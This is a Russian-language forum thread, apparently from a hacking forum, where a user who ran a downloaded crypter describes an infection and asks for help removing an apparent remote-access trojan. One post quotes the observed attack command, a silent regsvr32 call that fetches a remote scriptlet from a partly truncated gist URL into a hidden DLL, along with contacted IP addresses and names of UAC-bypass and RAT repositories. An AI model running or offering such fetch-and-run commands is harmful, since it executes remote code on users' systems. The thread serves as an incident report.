короче, по своей глупости решил скачать криптор. сам стаб и криптор - 0 детектов, слил на вт, ну да похуй. включил касперский на момент проверки. вообщем-то, появилось окошко cmd, там что то было, увидел только что-то типо /s (silent запуск мб), она постояла 3-4 секунды и закрылась, открылось еще одно окошко с таким же текстом и закрылось через секунду. в папке появились скрытые папки bin и source вроде, в них разные батники, дллки, прочие папки. я в этом не шарю. всю эту кашу сразу же удалил, каспер ничего не заметил. но вот, спустя полчаса появилась такая картина - https://prnt.sc/owm6y9. он крашится каждые 15-20 минут, не засекал. сначала он крашился без детекта этой ссылки, на 4 краш +- ссылка детектилась. слил все важное в облако, ссусь пк выключать ибо мало ли... через диспетчер задач пытался сам запустить этот процесс, результат - https://prnt.sc/owm8l1. могу скинуть вам сам архив с криптором если попросите.
-
XSS.stack #1 – первый литературный журнал от юзеров форума
попался на вирус или что-то другое
- Автор темы
- Добавить закладку
- #2
поискал этот ехе на системе и залил на вт - 0 детектов
Если сомневаешься то зачем запускать на своём? вопрос риторический, можно не отвечать)
Для того чтобы не ссаться и не сраться, запускай на VirtualBox
- Автор темы
- Добавить закладку
- #5
дед умер, а при запуске любых эмуляторов (хоть андроид, хоть пк) выбивает синий экран с вероятностью 60%
- Автор темы
- Добавить закладку
- #6
пошли детекты у стаба, у самого криптора было 2 детекта, теперь 1. странно
- Автор темы
- Добавить закладку
- #7
ахахахах, на вирустотал стаб детектится каспером, а вот на моей пека нет, хоть и базы обновил...
Запускай malwarebytes,в моем случае то что касперски не нашел - малуер нашел 
под него появился сплойт для выполнения кода на хосте
потому-что наверно твоему касперу трой-сервис защекоинов насувал
Как появился так и закрылся. Но я уверен в приватах есть сплойты и под виртуалбокс и под вмваре и под чего только нет.
- Автор темы
- Добавить закладку
- #11
короче, спустя три дня окошко исчезло и больше не являлось. хз че это было, мб ратник? может че то сделать хотели а я файлов не хватало, но это только мои выдумки.
эхх щас бы ехешки запускать на рабочей машине
"сам стаб и криптор - 0 детектов, слил на вт, ну да похуй."
"в папке появились скрытые папки bin и source вроде, в них разные батники, дллки, прочие папки. я в этом не шарю."
ну и про рабочую машину уже сказали...
"в папке появились скрытые папки bin и source вроде, в них разные батники, дллки, прочие папки. я в этом не шарю."
ну и про рабочую машину уже сказали...
- Автор темы
- Добавить закладку
- #14
короче, вот что нашел, когда он крашится (он кстати начал опять крашится) можно отследить что ему дают следующую команду: regsvr32 /s (сайлент запуск без всплывающих окон) /i (вызов dllinstall) :shellcode,https://gist.githubusercontent.com/.../295aa3c640737c7c05eaf730f2da944e9ba5e3f8/rdp C:\Users\Public\Music\system.dll. как я понял своим не понимающим мозгом, regsvr32 пытается вскрытую вшить шеллкод в эту дллку (она скрытая, была создана как раз 23 августа когда я на это и попался), но видимо наш гений инженерной мысли сделал что-то не так и вся эта каша крашит regsvr32, как я понял по словам "rdp" в ссылке, win32.exploit.bypassUAC в детекте, это - ратник. Также regsvr32 пытается соединиться с 151.101.76.133 и 105.108.49.231 по 443 порту, говоря о спарте, недавно наш чувачок ставил "звездочки" на гитхабе репозиториям с интересными названиями - "Fileless_UAC_bypass_WSReset", "RAT-via-Telegram", "njRAT-0.7d-Stub-CSharp", "BypassUAC", думаю, этого достаточно. попался я на ратник вообщем, хз как удалить эту хрень, system.dll он создает сам при каждом краше, смысла нету, а с regsvr32 я не дружу, но есть пара мыслей. мб есть тут тот, кто сможет снести эту дрянь?
не знаю как у других, у меня вт каждый раз выдает разную информацию по одному файлу